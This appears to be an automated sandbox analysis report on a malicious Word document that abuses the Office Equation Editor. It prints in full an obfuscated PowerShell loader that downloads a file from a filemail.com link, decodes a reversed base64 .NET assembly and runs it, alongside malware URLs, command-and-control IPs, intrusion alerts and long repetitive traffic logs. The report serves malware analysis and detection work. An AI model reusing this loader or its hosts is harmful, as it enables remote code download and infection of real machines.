      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]::L'+'oad(K'+'6pcommandBytes);K6pvaiMethod = [dn'+'lib.IO.Home].GetM'+'ethod(sSXVAIsSX);K6pvaiMethod.In'+'vok'+'e(K6pnul'+'l, @(sSXtxt.LSSWS/klo/ue.hsupwsrellor.sup//:ptthsSX, sSXdesativadosSX, sSXdesativadosSX, sSXdesat'+'ivadosSX, sSXdesativ'+'adosSX, sSX1sSX, sSXOneDriveSetupsSX,sSXdesativadosSX, sSXdesativadosSX,sSXdesativadosSX'+',sSXd'+'esativadosSX,sSXdesativadosSX,sSX1sSX,sSXdes'+'ativadosSX));').rEPLAce('K6p',[StrING][ChaR]36).rEPLAce('hNL','|').rEPLAce(([ChaR]115+[ChaR]83+[ChaR]88),[StrING][ChaR]39) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( ([StrinG]$vERBoSePreFEreNce)[1,3]+'x'-joIn'')(('K6pimageUrl'+' = s'+'SXhttps:/'+'/1017.filemail.com'+'/api'+'/file/get?filekey'+'=2'+'Aa'+'_bWo9Reu45t7BU1kVgsd9'+'pT9p'+'gSSlvStGrnTI'+'CfFhmTKj'+'3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f sSX;K6pwebClient = New-Object System.Net.WebC'+'lient;K6pimageBytes = K6pwe'+'bClient.Downloa'+'dData(K6pimageUrl);K6pimageText = [System.Text.Encoding]::UTF8.GetString(K6pimageBytes);K6pstartFlag = sSX<<BASE64_START>>sSX;K6pendFlag = s'+'SX<<BASE64_E'+'ND>>sSX;K6pstar'+'tIndex = K6pimageText.IndexOf(K6pstartFlag);K6pendIndex = K6pimageText.IndexOf(K6pendFlag);K'+'6pstartIndex -ge 0 -and K6pendIndex -gt'+' K6pstartIndex;K6pstartIndex += K6pstartFlag.Length;K6pbase64Length = K6pendIndex - K6pstartIndex;K6pbase6'+'4Command = K6pimage'+'Text.Substring(K6pstartIndex, K6pbase64Length);K6pbase64Reversed = -join (K6pbase64Command.ToCharArr'+'ay() '+'hNL ForEach-Object { K6p_ })[-1'+'..-(K6pbase64Com'+'mand.Length)];K6pcommandBytes = [System.Convert]::FromBase64String(K6pbase64Rever'+'sed);K6ploadedAssembly = [Sys'+'tem.Reflection.Assembly]:
      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3916, TargetFilename: C:\Users\user\AppData\Local\Temp\hnmmngyn.v50.ps1
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T16:51:07.228654+010020490381A Network Trojan was detected142.215.209.78443192.168.2.2249166TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-11-07T16:50:53.184022+010028582951A Network Trojan was detected141.98.10.8880192.168.2.2249167TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: http://sbv.pushswroller.eu/tes/jukhccby.vbs8Avira URL Cloud: Label: malware
      Source: http://sbv.pushswroller.eu/tes/jukhccby.vbsjAvira URL Cloud: Label: malware
      Source: http://sbv.pushswroller.eu/tes/jukhccby.vbsAvira URL Cloud: Label: malware
      Source: http://sbv.pushswroller.eu/tes/jukhccby.vbsmmC:Avira URL Cloud: Label: malware
      Source: http://pus.rollerswpush.eu/olk/SWSSL.txtAvira URL Cloud: Label: malware
      Source: ConfirmaciXnXdeXfacturaXPedidoXadicional.docReversingLabs: Detection: 44%

      Exploits

      barindex
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 141.98.10.88 Port: 80Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: ??\C:\Windows\System.pdbpdbtem.pdbGAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb.Core.pdb\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.419784641.00000000006DD000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.420218048.0000000000DB2000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+b source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.420218048.0000000000DB2000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.420218048.0000000000DB2000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.428248929.0000000006261000.00000004.00000800.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficDNS query: name: sbv.pushswroller.eu
      Source: global trafficDNS query: name: paste.ee
      Source: global trafficDNS query: name: paste.ee
      Source: global trafficDNS query: name: 1017.filemail.com
      Source: global trafficDNS query: name: 1017.filemail.com
      Source: global trafficDNS query: name: pus.rollerswpush.eu
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49163 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49164 -> 188.114.97.3:80
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 141.98.10.88:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 188.114.97.3:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
